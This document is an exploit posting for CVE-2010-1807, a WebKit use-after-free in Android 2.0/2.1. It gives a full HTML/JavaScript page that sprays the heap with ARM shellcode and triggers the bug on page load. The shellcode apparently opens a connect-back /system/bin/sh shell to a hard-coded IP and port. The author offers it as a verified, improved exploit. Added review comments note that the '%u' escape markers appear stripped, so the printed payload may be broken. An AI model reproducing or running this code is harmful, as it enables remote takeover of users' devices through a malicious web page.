# Title : Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Published : 2010-11-15
# Author : Itzhak Avraham
# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807
Better exploit (higher success rate and more flexible to changes, also shorter shellcode) than the one you currently have; it is also verified. Enjoy!
More details at: http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html
<html>
<head>
<script>
// This code is for security research / teaching purposes only; use at your own risk!
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// Patched in Android 2.2; some reports say it still works on certain devices running 2.2.
//originally noticed/written by mj(good job man!)
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com
// Connect-back address that exploit() appends to the end of the shellcode string.
// NOTE(review): the unescape() arguments read "uXXXX" with no '%' sign; the "%u"
// escape markers appear to have been stripped in transcription. As printed,
// unescape() returns these strings unchanged. Verify against the original listing.
var ip = unescape("ua8c0u0100"); // ip = 192.168.0.1 (0xc0a8, 0x0001 as little-endian UTF-16 units)
var port = unescape("u3930"); //port 12345 (hex(0x3039)), byte order 0x30 0x39 i.e. network order
// Alternative for the Android emulator host: unescape("u000au0202") -> ip = 10.0.2.2
function trigger()
{
  // Appends a fresh <div> to the body element and assigns its innerHTML from the
  // negated result of parseFloat() on a malformed "NAN(...)" literal. Per the
  // original author's note, this float parse is what triggers the use-after-free
  // (CVE-2010-1807). Pure DOM side effect; nothing is returned.
  const host = document.getElementById("BodyID");
  const holder = document.createElement("div");
  host.appendChild(holder);
  holder.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //trigger use-after-free
}
function exploit()
{
// Builds the payload string, sprays 0x1000 copies of it into an array, writes each
// copy into the document and, for the last stretch of the loop, calls trigger() so
// the object freed by the float-parse bug is reused by sprayed data. Pure DOM/heap
// side effects; returns nothing.
// NOTE(review): every unescape() argument in this file reads "uXXXX" with no '%'
// sign — the "%u" escape markers look like they were stripped in transcription. As
// printed, unescape() returns these strings unchanged, so the "opcodes" below are
// literal ASCII text. Check against the original listing before relying on it.
var nop = unescape("u33bcu0057"); //LDREQH R3,[R7],-0x3C for nopping
do
{
nop+=nop; // doubles the sled each pass until its length exceeds 0x1000 code units
} while (nop.length<=0x1000);
// Sled + payload. The tail of the literal (u2f2f ... u6873) decodes, as little-endian
// UTF-16 units, to the ASCII path "///system/bin/sh", followed by u2000 padding and
// u0002; with port and ip appended right after, this lays out like a sockaddr_in
// (AF_INET = 2, network-order port, IPv4 address) — consistent with a connect-back
// shell. Inferred from the bytes, not verified here.
var scode = nop+unescape("u1001ue1a0u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002");
scode += port;
scode += ip;
scode += unescape("u2000u2000"); // trailing padding
// NOTE(review): `target` and `i` are assigned without var and therefore become
// globals on window; harmless for this page, but worth knowing if the snippet is reused.
target = new Array();
for(i = 0; i < 0x1000; i++)
target[i] = scode; // 0x1000 copies of scode at indices 0..0xfff
// The loop bound is <=, so the final iteration reads target[0x1000], which was never
// set, and writes "undefined<i>" — whether that is deliberate padding is not stated.
for (i = 0; i <= 0x1000; i++)
{
document.write(target[i]+"<i>");
if (i>0x999)
{
trigger(); // fired on every iteration from i = 0x99a through 0x1000 (1639 times)
}
}
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
// Entry point: runs during page parse, after the <body id="BodyID"> element above
// exists, so trigger() can append to it. Nothing on the page is interactive.
exploit();
</script>
</body>
</html>
Twitter account : @ihackbanme